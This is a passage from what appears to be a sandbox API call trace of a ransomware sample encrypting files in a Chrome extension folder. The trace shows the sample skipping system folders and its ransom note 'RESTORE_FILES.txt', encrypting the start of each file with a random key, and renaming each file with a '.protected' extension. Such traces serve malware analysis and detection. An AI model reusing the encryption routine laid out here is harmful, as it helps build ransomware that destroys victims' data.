dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0083.307] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js") returned 158 [0083.307] StrStrW (lpFirst="mirroring_common.js", lpSrch=".txt") returned 0x0 [0083.307] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js") returned 158 [0083.307] StrStrW (lpFirst="mirroring_common.js", lpSrch=".rar") returned 0x0 [0083.307] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js") returned 158 [0083.307] StrStrW (lpFirst="mirroring_common.js", lpSrch=".zip") returned 0x0 [0083.307] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0083.312] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.312] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0083.312] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.312] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 
1 [0083.317] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0083.318] CloseHandle (hObject=0x160) returned 1 [0083.318] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js.protected") returned 168 [0083.318] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js.protected")) returned 1 [0083.319] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0083.319] lstrcmpiW (lpString1="mirroring_hangouts.js", lpString2="Windows") returned -1 [0083.319] lstrcmpiW (lpString1="mirroring_hangouts.js", lpString2="Program Files") returned -1 [0083.319] lstrcmpiW (lpString1="mirroring_hangouts.js", lpString2="Program Files (x86)") returned -1 [0083.319] lstrcmpiW (lpString1="mirroring_hangouts.js", lpString2="$Recycle.bin") returned 1 [0083.319] lstrcmpiW (lpString1="mirroring_hangouts.js", lpString2="System Volume Information") returned -1 
[0083.319] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js") returned 160 [0083.319] StrStrIW (lpFirst="mirroring_hangouts.js", lpSrch=".protected") returned 0x0 [0083.319] lstrcmpW (lpString1="mirroring_hangouts.js", lpString2="RESTORE_FILES.txt") returned -1 [0083.319] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0083.319] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0083.319] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0083.320] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js") returned 160 [0083.320] StrStrW (lpFirst="mirroring_hangouts.js", lpSrch=".txt") returned 0x0 [0083.320] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js") returned 160 [0083.320] StrStrW (lpFirst="mirroring_hangouts.js", lpSrch=".rar") returned 0x0 [0083.320] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js") returned 160 [0083.320] StrStrW (lpFirst="mirroring_hangouts.js", lpSrch=".zip") returned 0x0 [0083.320] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0083.322] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.322] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0083.322] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.322] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0083.334] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0083.334] CloseHandle (hObject=0x160) returned 1 [0083.334] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js.protected") returned 170 [0083.335] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js.protected")) returned 1 [0083.335] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0083.335] lstrcmpiW (lpString1="mirroring_webrtc.js", lpString2="Windows") returned -1 [0083.335] lstrcmpiW (lpString1="mirroring_webrtc.js", lpString2="Program Files") returned -1 [0083.335] lstrcmpiW (lpString1="mirroring_webrtc.js", lpString2="Program Files (x86)") returned -1 [0083.335] lstrcmpiW (lpString1="mirroring_webrtc.js", lpString2="$Recycle.bin") returned 1 [0083.335] lstrcmpiW (lpString1="mirroring_webrtc.js", lpString2="System Volume Information") returned -1 [0083.336] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js") returned 158 [0083.336] StrStrIW (lpFirst="mirroring_webrtc.js", lpSrch=".protected") returned 0x0 [0083.336] lstrcmpW (lpString1="mirroring_webrtc.js", lpString2="RESTORE_FILES.txt") returned -1 [0083.336] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0083.336] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, 
dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0083.336] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0083.336] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js") returned 158 [0083.336] StrStrW (lpFirst="mirroring_webrtc.js", lpSrch=".txt") returned 0x0 [0083.336] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js") returned 158 [0083.336] StrStrW (lpFirst="mirroring_webrtc.js", lpSrch=".rar") returned 0x0 [0083.336] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js") returned 158 [0083.336] StrStrW (lpFirst="mirroring_webrtc.js", lpSrch=".zip") returned 0x0 [0083.336] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x941, lpOverlapped=0x0) returned 1 [0083.346] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xfffff6bf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.346] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, 
nNumberOfBytesToWrite=0x941, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x941, lpOverlapped=0x0) returned 1 [0083.347] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.347] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0083.347] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0083.347] CloseHandle (hObject=0x160) returned 1 [0083.347] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js.protected") returned 168 [0083.347] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js.protected")) returned 1 [0083.348] FindNextFileW (in: hFindFile=0x47bb90, 
lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0083.348] lstrcmpiW (lpString1="_locales", lpString2="Windows") returned -1 [0083.348] lstrcmpiW (lpString1="_locales", lpString2="Program Files") returned -1 [0083.348] lstrcmpiW (lpString1="_locales", lpString2="Program Files (x86)") returned -1 [0083.348] lstrcmpiW (lpString1="_locales", lpString2="$Recycle.bin") returned 1 [0083.348] lstrcmpiW (lpString1="_locales", lpString2="System Volume Information") returned -1 [0083.348] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales") returned 147 [0083.348] lstrcmpW (lpString1="_locales", lpString2=".") returned 1 [0083.348] lstrcmpW (lpString1="_locales", lpString2="..") returned 1 [0083.348] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\*") returned 149 [0083.348] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 [0083.350] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.350] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.350] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.350] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.350] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.350] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\.") returned 149 [0083.350] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.350] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.351] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.351] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.351] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.351] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.351] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.351] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\..") returned 150 [0083.351] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.351] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.351] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.351] lstrcmpiW (lpString1="am", lpString2="Windows") returned -1 [0083.351] lstrcmpiW (lpString1="am", lpString2="Program Files") returned -1 [0083.351] lstrcmpiW (lpString1="am", lpString2="Program Files (x86)") returned -1 [0083.351] lstrcmpiW (lpString1="am", lpString2="$Recycle.bin") returned 1 [0083.351] lstrcmpiW (lpString1="am", lpString2="System Volume Information") returned -1 [0083.351] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am") returned 150 [0083.351] lstrcmpW (lpString1="am", lpString2=".") returned 1 [0083.351] lstrcmpW 
(lpString1="am", lpString2="..") returned 1 [0083.351] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\*") returned 152 [0083.351] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.351] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.351] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.351] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.351] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.351] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.352] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\.") returned 152 [0083.352] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.352] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.352] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.352] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.352] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.352] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.352] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.352] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\..") returned 153 [0083.352] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.352] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.352] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.352] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.352] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.352] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.352] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.352] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.352] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json") returned 164 [0083.352] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.352] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.352] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.352] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.352] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.353] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json") returned 164 [0083.353] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.354] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json") returned 164 [0083.354] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.354] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json") returned 164 [0083.354] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.354] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.356] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.356] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.356] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.356] WriteFile (in: hFile=0x168, 
lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.356] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.356] CloseHandle (hObject=0x168) returned 1 [0083.357] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json.protected") returned 174 [0083.357] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js 